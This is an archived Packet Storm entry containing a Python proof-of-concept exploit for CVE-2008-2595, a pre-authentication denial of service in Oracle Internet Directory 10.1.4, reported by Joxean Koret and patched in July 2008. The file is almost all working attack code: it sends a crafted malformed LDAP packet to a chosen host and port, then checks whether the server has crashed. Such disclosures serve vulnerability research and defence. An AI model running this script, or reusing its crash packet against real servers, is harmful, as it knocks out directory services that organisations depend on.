oracleidir-dos.txt

2008-07-21T00:00:00
ID PACKETSTORM:68369
Type packetstorm
Reporter Joxean Koret
Modified 2008-07-21T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
"""  
Oracle Internet Directory 10.1.4 preauthentication Denial Of Service  
  
NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.  
Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one  
shoot, but even when you only send one packet it will crash.  
  
Tested: Win2000 x86, WinXP x86, Win2003 X86_64  
  
Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)  
  
Fixed: Oracle Critical Patch Update July 2008  
CVEID: CVE-2008-2595  
"""  
  
import sys  
import time  
import socket  
  
healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"  
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00"  
  
def checkHealth(hostname, port):  
print " --> Wating 5 seconds"  
time.sleep(5)  
  
print " --> Connecting to target..."  
socket.setdefaulttimeout(5)  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((hostname, port))  
  
try:  
print " --> Sending 'health' packet ..."  
s.sendall(healthPacket)  
print " --> Trying to receive something..."  
data = s.recv(1024)  
except:  
err = sys.exc_info()[1]  
  
if int(err[0]) == 104:  
print "[+] Exploits works!"  
return  
  
if data != "":  
print "[!] Server is up and running :("  
else:  
print "[?] Server doesn't answer nothing. It works?"  
  
def oidDos(hostname, port):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
print "[+] Connecting to ldap://%s:%d..." % (hostname, port)  
s.connect((hostname, int(port)))  
  
print "[+] Sending packet..."  
s.sendall(packet)  
s.close()  
  
print "[+] Checking OID's health..."  
checkHealth(hostname, port)  
except:  
print sys.exc_info()[1]  
  
def usage():  
print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"  
print "Copyright (c) 2007 Joxean Koret"  
print  
print "Usage:"  
print sys.argv[0],"-h<hostname> -p<port>"  
print  
  
def main():  
if len(sys.argv) != 3:  
usage()  
sys.exit(0)  
  
hostname = None  
port = None  
  
i = 0  
for param in sys.argv:  
i += 1  
  
if i == 1:  
continue  
  
if param.startswith("-h"):  
hostname = param[2:]  
elif param.startswith("-p"):  
port = int(param[2:])  
else:  
print "Unknown option '%s'" % param  
usage()  
sys.exit(1)  
  
if not hostname or not port:  
print "Bad command line."  
usage()  
sys.exit(1)  
  
oidDos(hostname, port)  
  
if __name__ == "__main__":  
main()  
  
`